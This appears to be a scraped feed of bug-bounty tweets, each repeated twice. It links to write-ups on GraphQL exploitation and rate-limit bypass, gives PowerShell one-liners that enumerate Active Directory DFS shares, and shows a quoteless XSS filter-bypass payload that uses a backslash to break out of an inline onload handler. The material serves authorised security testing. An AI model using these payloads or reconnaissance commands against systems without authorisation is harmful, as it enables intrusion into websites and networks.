GraphQL — Common vulnerabilities & how to exploit them
https://t.co/zwuE1akzCH
Mastering the Skills of Bug Bounty
https://t.co/aqgP65mTbr
Methods to Bypass Rate Limit
https://t.co/T38i5qR3hJ
Bug bounty resources & advices
https://t.co/GAvQwPW0uo
#bugbounty,#bugbountytips
https://t.co/zwuE1akzCH
Mastering the Skills of Bug Bounty
https://t.co/aqgP65mTbr
Methods to Bypass Rate Limit
https://t.co/T38i5qR3hJ
Bug bounty resources & advices
https://t.co/GAvQwPW0uo
#bugbounty,#bugbountytips
Medium
GraphQL — Common vulnerabilities & how to exploit them
Hello there! how you doin? , Bilal Rizwan here & I hope everyone is safe in this time of crisis and making complete use of your…
Self-reminder - finding DFS shares
AD
Get-ADObject -filter * -SearchBase "CN=Dfs-Configuration,CN=System,DC=a,DC=b" | select name
ADSI
$s=[adsisearcher]'(name=*)'; $s.SearchRoot = [adsi]"LDAP://CN=Dfs-Configuration,CN=System,dc=a,dc=b"; $s.FindAll() | % {$_.properties.name}
AD
Get-ADObject -filter * -SearchBase "CN=Dfs-Configuration,CN=System,DC=a,DC=b" | select name
ADSI
$s=[adsisearcher]'(name=*)'; $s.SearchRoot = [adsi]"LDAP://CN=Dfs-Configuration,CN=System,dc=a,dc=b"; $s.FindAll() | % {$_.properties.name}
quoteless #XSS filter bypass (removing HTML chars) in an inline JS function with multiple params
Normal:
/page?x=1&y=2&z=3
Downwards arrow
<body onload="func('1', '2', '3')">
XSS:
/page?x=1&y=%5C&z=);alert(1);//
Downwards arrow
<body onload="func('1', '\', ');alert(1);//'">
Normal:
/page?x=1&y=2&z=3
Downwards arrow
<body onload="func('1', '2', '3')">
XSS:
/page?x=1&y=%5C&z=);alert(1);//
Downwards arrow
<body onload="func('1', '\', ');alert(1);//'">